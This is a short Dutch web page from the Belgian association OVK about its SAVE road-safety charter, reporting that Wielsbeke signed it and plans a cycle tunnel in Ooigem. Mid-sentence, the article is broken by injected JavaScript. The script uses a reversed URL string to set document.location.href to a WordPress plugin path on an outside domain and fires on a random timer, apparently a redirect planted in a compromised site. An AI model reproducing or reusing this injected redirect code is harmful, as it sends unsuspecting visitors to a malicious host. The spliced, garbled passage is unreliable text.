Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Wielsbeke ondertekent SAVE-charter

Als 12e gemeente of stad in West-Vlaanderen ondertekende Wielsbeke op donderdag 3 september het SAVE-charter Steden & Gemeenten. Ze zijn daarmee de 54e gemeente in Vlaanderen die het charter ondertekent.

Het ondertekenen van het Charter is niet vrijblijvend en is voor Wielsbeke het signaal om nog meer in te zetten op hun huidig mobiliteitsbeleid. Er zijn tal van ideeën die zullen genoteerd worden in het SAVE-actieplan. Het gemeentebestuur is in dat kader al met een aantal dossiers van start gegaan. Heel wat acties zijn er op gericht zijn om onmiddellijk resultaat te boeken op het vlak van verkeersveiligheid. Een concreet voorbeeld is de in de nabije toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst geplande aanleg van een fietstunnel ter hoogte van de drietrapssluis in Ooigem.  Momenteel ligt hier een druk gebruikt kruispunt waar fietsers en wagens elkaar kruisen, met alle gevaar van dien.  Dit gevaar wordt weggenomen met de aanleg van de tunnel.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be